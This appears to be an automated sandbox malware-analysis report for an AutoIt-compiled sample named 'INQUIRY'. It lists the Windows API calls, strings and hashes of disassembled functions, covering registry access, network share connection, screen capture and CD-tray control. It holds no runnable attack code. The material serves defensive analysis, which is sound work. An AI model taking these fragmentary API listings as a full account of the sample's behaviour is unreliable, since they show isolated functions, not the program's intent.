• _wprintf.LIBCMT ref: 00A79DB9
• _wprintf.LIBCMT ref: 00A79DD7
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: 134faf85b1bcc80f6ec40def994cf64d456263faed94a2fc12c2a5644ede66ef
• Instruction ID: 4068d81bdda8b5bfeda092ec2755b283b7daa372aaa1a594639a5cbb33df88f5
APIs
  • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
  • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
• CharLowerBuffW.USER32(?,?), ref: 00A7A3CB
• GetDriveTypeW.KERNEL32 ref: 00A7A418
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A460
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A497
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A4C5
  • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: e9bf94624ca95caed130015be81f0aa1bd6552bb6b3205ca039ef9e8aaae8eb6
• Instruction ID: 9631be307a51abb3ea2273474a18c0d225674e9962201acb5675474e1819f0c4
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00A4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00A6F8DF
• LoadStringW.USER32(00000000,?,00A4E029,00000001), ref: 00A6F8E8
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
• GetModuleHandleW.KERNEL32(00000000,00AD5310,?,00000FFF,?,?,00A4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00A6F90A
• LoadStringW.USER32(00000000,?,00A4E029,00000001), ref: 00A6F90D
• __swprintf.LIBCMT ref: 00A6F95D
• __swprintf.LIBCMT ref: 00A6F96E
• _wprintf.LIBCMT ref: 00A6FA17
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A6FA2E
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: 2bd6b84af9c73de6986e5c315c95866e6f0e16cb7ccc124f24468deb29dec718
• Instruction ID: a0b945536a237fe4bb8ae9ce6a72645be78357175c0551b7b649d372803f4770
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
• String ID:
• API String ID: 884005220-0
• Opcode ID: 63e374e305d5ffdeaf87c263206dc1135f651a4bb10ec265bfe665ab2c5c5ee3
• Instruction ID: 6d2256cb5ecd9a551698a82c40b01ed7beaba91efe37f5f51aa6f145a1430cc9
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00A9BA56
• GetFileSize.KERNEL32(00000000,00000000), ref: 00A9BA6D
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00A9BA78
• CloseHandle.KERNEL32(00000000), ref: 00A9BA85
• GlobalLock.KERNEL32(00000000), ref: 00A9BA8E
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A9BA9D
• GlobalUnlock.KERNEL32(00000000), ref: 00A9BAA6
• CloseHandle.KERNEL32(00000000), ref: 00A9BAAD
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A9BABE
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00AA2CAC,?), ref: 00A9BAD7
• GlobalFree.KERNEL32(00000000), ref: 00A9BAE7
• GetObjectW.GDI32(?,00000018,000000FF), ref: 00A9BB0B
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 00A9BB36
• DeleteObject.GDI32(00000000), ref: 00A9BB5E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A9BB74
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 9f17b8de9df6cabecbcff9a5005f3d9d21808a1cd3a7a3861fce2d015f27c63b
• Instruction ID: 7e774b76f210af669e37fd0fbee33e07839848e4ab6b90d893e10fe09df43702
                                                                                              APIs
                                                                                              • __wsplitpath.LIBCMT ref: 00A7DA10
                                                                                              • _wcscat.LIBCMT ref: 00A7DA28
                                                                                              • _wcscat.LIBCMT ref: 00A7DA3A
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A7DA4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DA63
• GetFileAttributesW.KERNEL32(?), ref: 00A7DA7B
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00A7DA95
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DAA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
APIs
  • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A9C1FC
• GetFocus.USER32 ref: 00A9C20C
• GetDlgCtrlID.USER32(00000000), ref: 00A9C217
• _memset.LIBCMT ref: 00A9C342
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A9C36D
• GetMenuItemCount.USER32(?), ref: 00A9C38D
• GetMenuItemID.USER32(?,00000000), ref: 00A9C3A0
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A9C3D4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A9C41C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A9C454
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A9C489
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
APIs
• GetDC.USER32(00000000), ref: 00A8738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A8739B
• CreateCompatibleDC.GDI32(?), ref: 00A873A7
• SelectObject.GDI32(00000000,?), ref: 00A873B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A87408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A87444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A87468
• SelectObject.GDI32(00000006,?), ref: 00A87470
• DeleteObject.GDI32(?), ref: 00A87479
• DeleteDC.GDI32(00000006), ref: 00A87480
• ReleaseDC.USER32(00000000,?), ref: 00A8748B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
APIs
  • Part of subcall function 00A30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A16B0C,?,00008000), ref: 00A30973
  • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A16BAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A16CFA
  • Part of subcall function 00A1586D: _wcscpy.LIBCMT ref: 00A158A5
  • Part of subcall function 00A3363D: _iswctype.LIBCMT ref: 00A33645
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
APIs
• _memset.LIBCMT ref: 00A72D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00A72DDD
• GetMenuItemCount.USER32(00AD5890), ref: 00A72E66
• DeleteMenu.USER32(00AD5890,00000005,00000000,000000F5,?,?), ref: 00A72EF6
• DeleteMenu.USER32(00AD5890,00000004,00000000), ref: 00A72EFE
• DeleteMenu.USER32(00AD5890,00000006,00000000), ref: 00A72F06
• DeleteMenu.USER32(00AD5890,00000003,00000000), ref: 00A72F0E
• GetMenuItemCount.USER32(00AD5890), ref: 00A72F16
• SetMenuItemInfoW.USER32(00AD5890,00000004,00000000,00000030), ref: 00A72F4C
• GetCursorPos.USER32(?), ref: 00A72F56
• SetForegroundWindow.USER32(00000000), ref: 00A72F5F
• TrackPopupMenuEx.USER32(00AD5890,00000000,?,00000000,00000000,00000000), ref: 00A72F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A72F7E
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
APIs
  • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
• _memset.LIBCMT ref: 00A6786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A678A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A678BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A678D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A67902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00A6792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A67935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A6793A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A4E2A0,00000010,?,Bad directive syntax error,00A9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A6F7C2
• LoadStringW.USER32(00000000,?,00A4E2A0,00000010), ref: 00A6F7C9
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
• _wprintf.LIBCMT ref: 00A6F7FC
• __swprintf.LIBCMT ref: 00A6F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A6F88D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
                                                                                              APIs
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                                • Part of subcall function 00A17924: _memmove.LIBCMT ref: 00A179AD
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A75330
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A75346
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A75357
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A75369
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A7537A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_memmove
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2279737902-1007645807
                                                                                              • Opcode ID: 4be8385184a264a6a51f6c5c02c10d40d672f52f9a62362ce415182415975755
                                                                                              • Instruction ID: 397ce77eb56cddf7c39aa38dc9b447e57085635dbd2af99efaf26d836179bfb0
                                                                                              • Opcode Fuzzy Hash: 4be8385184a264a6a51f6c5c02c10d40d672f52f9a62362ce415182415975755
                                                                                              • Instruction Fuzzy Hash: 22118F31E5012979D720B7B1CC5AEFFBBBCFB91B80F004C2AB415A60E1EEA00D45C5A0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 208665112-3771769585
                                                                                              • Opcode ID: ebe4eb6897e0966756fae3a09f1be76288265f522d655e3a978da456484c43ff
                                                                                              • Instruction ID: 07056db05fbc92389c97c93e7f7a7a5fc2ff0dd8591fcbb799c0db8374b7b682
                                                                                              • Opcode Fuzzy Hash: ebe4eb6897e0966756fae3a09f1be76288265f522d655e3a978da456484c43ff
                                                                                              • Instruction Fuzzy Hash: B311E7316001146FDB24AB709C8AEDA77BCEF06711F04C1B6F449D60A1FF719D828B50
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00A74F7A
                                                                                                • Part of subcall function 00A3049F: timeGetTime.WINMM(?,75C0B400,00A20E7B), ref: 00A304A3
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A74FA6
                                                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00A74FCA
                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A74FEC
                                                                                              • SetActiveWindow.USER32 ref: 00A7500B
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A75019
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A75038
                                                                                              • Sleep.KERNEL32(000000FA), ref: 00A75043
                                                                                              • IsWindow.USER32 ref: 00A7504F
                                                                                              • EndDialog.USER32(00000000), ref: 00A75060
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: 1bc61423026924374954a944ad5996aab13eb6ab4b21ec491c9710250f808769
                                                                                              • Instruction ID: 35ef6931d5b9570e755cd66bbea0c2610bdfbf8466259525742e9d597eb3fa05
                                                                                              • Opcode Fuzzy Hash: 1bc61423026924374954a944ad5996aab13eb6ab4b21ec491c9710250f808769
                                                                                              • Instruction Fuzzy Hash: AC21CF74701604BFE710DFB0EC88A263B69EB08745F14903AF10BC11B4DF758D528661
                                                                                              APIs
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A7D5EA
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A7D67D
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00A7D691
                                                                                              • CoCreateInstance.OLE32(00AA2D7C,00000000,00000001,00AC8C1C,?), ref: 00A7D6DD
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A7D74C
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00A7D7A4
                                                                                              • _memset.LIBCMT ref: 00A7D7E1
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00A7D81D
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A7D840
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A7D847
                                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A7D87E
                                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00A7D880
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1246142700-0
                                                                                              • Opcode ID: 0b5739f03827571c56d508768acdfe4d704541a61e0bd0da4b995ef6714c6700
                                                                                              • Instruction ID: ac121697811a267e2658e2c4818b777c064d8562a288f16df0e4dae6576f96bf
                                                                                              • Opcode Fuzzy Hash: 0b5739f03827571c56d508768acdfe4d704541a61e0bd0da4b995ef6714c6700
